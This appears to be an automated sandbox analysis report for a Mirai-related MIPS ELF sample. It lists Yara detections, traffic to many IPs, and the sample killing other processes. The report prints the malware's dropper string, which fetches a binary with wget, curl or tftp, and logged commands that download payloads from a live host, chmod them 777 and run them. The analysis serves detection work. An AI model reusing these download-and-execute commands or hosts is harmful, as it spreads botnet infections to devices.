Source: /tmp/system |
Avira: detection malicious, Label: EXP/ELF.Agent.J.8 |
Source: shk.14.dr |
String: cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip |
Source: system.24.dr |
String: /system/proc/self/exe/proc/proc//cmdlineld.sowgettftpcurl/exe |
Source: global traffic |
TCP traffic: 192.168.2.23:36034 -> 185.224.128.34:33335 |
Source: /bin/sh (PID: 6213) |
Wget executable: /usr/bin/wget -> wget http://185.224.128.34/shk |
Source: /bin/sh (PID: 6219) |
Wget executable: /usr/bin/wget -> wget http://185.224.128.34/mips -O system |
Source: /tmp/system (PID: 6221) |
Socket: 127.0.0.1::33337 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 106.148.45.41 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 200.149.252.41 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 223.68.120.41 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 150.96.78.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 78.62.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 249.225.40.54 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 137.203.160.108 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 32.142.109.173 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 129.109.37.211 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 12.61.57.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 143.102.55.216 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.108.69.44 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 51.207.27.93 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 106.188.187.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 108.84.81.58 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 77.185.84.58 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 249.76.250.189 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 199.15.94.9 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 136.7.114.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 25.75.3.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 246.184.16.162 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.172.227.147 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 25.90.213.142 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 205.200.24.255 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 71.24.26.169 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 135.152.8.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 118.3.19.175 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 76.149.240.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 164.245.75.94 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 133.165.237.162 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 191.134.200.230 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.149.69.44 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 245.180.32.248 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 63.188.242.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 155.149.137.144 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 254.101.85.223 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 215.227.236.246 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 79.94.26.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.75.183.200 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 97.243.62.227 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 205.59.146.130 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 195.182.43.120 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 246.146.104.30 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 41.171.76.135 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 141.37.74.243 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 33.86.44.99 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.254.150.24 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 35.118.4.255 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 68.38.166.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 162.66.218.70 |
Source: global traffic |
HTTP traffic detected: GET /shk HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 185.224.128.34Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mips HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 185.224.128.34Connection: Keep-Alive |
Source: unknown |
DNS traffic detected: queries for: rooty.cc |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 39250 |
Source: unknown |
Network traffic detected: HTTP traffic on port 33606 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 39250 -> 443 |
Source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: /tmp/system, type: DROPPED |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: /tmp/system (PID: 6225) |
SIGKILL sent: pid: 6223, result: successful |
Source: /tmp/system (PID: 6225) |
SIGKILL sent: pid: 6227, result: successful |
Source: /tmp/system (PID: 6225) |
SIGKILL sent: pid: -6225, result: unknown |
Source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: /tmp/system, type: DROPPED |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: classification engine |
Classification label: mal68.troj.evad.lin@0/2@1/0 |
Source: /bin/sh (PID: 6215) |
Chmod executable: /usr/bin/chmod -> chmod 777 shk |
Source: /bin/sh (PID: 6220) |
Chmod executable: /usr/bin/chmod -> chmod 777 system |
Source: /bin/sh (PID: 6212) |
Rm executable: /usr/bin/rm -> rm -rf shk |
Source: /bin/sh (PID: 6217) |
Rm executable: /usr/bin/rm -> rm -rf system |
Source: /bin/sh (PID: 6218) |
Rm executable: /usr/bin/rm -> rm -rf mips |
Source: /bin/sh (PID: 6233) |
Rm executable: /usr/bin/rm -> rm -rf system |
Source: /bin/sh (PID: 6234) |
Rm executable: /usr/bin/rm -> rm -rf shk |
Source: /usr/bin/dash (PID: 6298) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby |
Source: /usr/bin/dash (PID: 6299) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby |
Source: /bin/sh (PID: 6213) |
Wget executable: /usr/bin/wget -> wget http://185.224.128.34/shk |
Source: /bin/sh (PID: 6219) |
Wget executable: /usr/bin/wget -> wget http://185.224.128.34/mips -O system |
Source: /usr/bin/chmod (PID: 6215) |
File: /tmp/shk (bits: - usr: rwx grp: rwx all: rwx) |
Source: /usr/bin/chmod (PID: 6220) |
File: /tmp/system (bits: - usr: rwx grp: rwx all: rwx) |
Source: /bin/sh (PID: 6215) |
Chmod executable with 777: /usr/bin/chmod -> chmod 777 shk |
Source: /bin/sh (PID: 6220) |
Chmod executable with 777: /usr/bin/chmod -> chmod 777 system |
Source: /usr/bin/wget (PID: 6219) |
File written: /tmp/system |
Source: submitted sample |
Stderr:
--2024-03-29 09:24:47--  http://185.224.128.34/shk
Connecting to 185.224.128.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 477
Saving to: shk
     0K                                                       100%  625K=0.001s
2024-03-29 09:24:47 (625 KB/s) - shk saved [477/477]
--2024-03-29 09:24:47--  http://185.224.128.34/mips
Connecting to 185.224.128.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 71788 (70K)
Saving to: system
     0K .......... .......... .......... .......... ..........  71%  141K 0s
    50K .......... ..........                                  100%  543K=0.4s
2024-03-29 09:24:48 (179 KB/s) - system saved [71788/71788]
exit code = 0 |
Source: /usr/bin/rm (PID: 6217) |
File: /tmp/system |
Source: /usr/bin/rm (PID: 6233) |
File: /tmp/system |
Source: /tmp/system (PID: 6221) |
Queries kernel information via 'uname': |
Source: sh, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6223.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6225.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6227.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/mips |
Source: sh, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6223.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6225.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6227.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-mips |
Source: sh, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6223.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6225.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6227.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp |
Binary or memory string: U1!/etc/qemu-binfmt/mips |
Source: sh, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6223.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6225.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6227.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp |
Binary or memory string: x86_64/usr/bin/qemu-mips./systemtplinkSUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./system |
Source: Yara match |
File source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: /tmp/system, type: DROPPED |
Source: Yara match |
File source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: /tmp/system, type: DROPPED |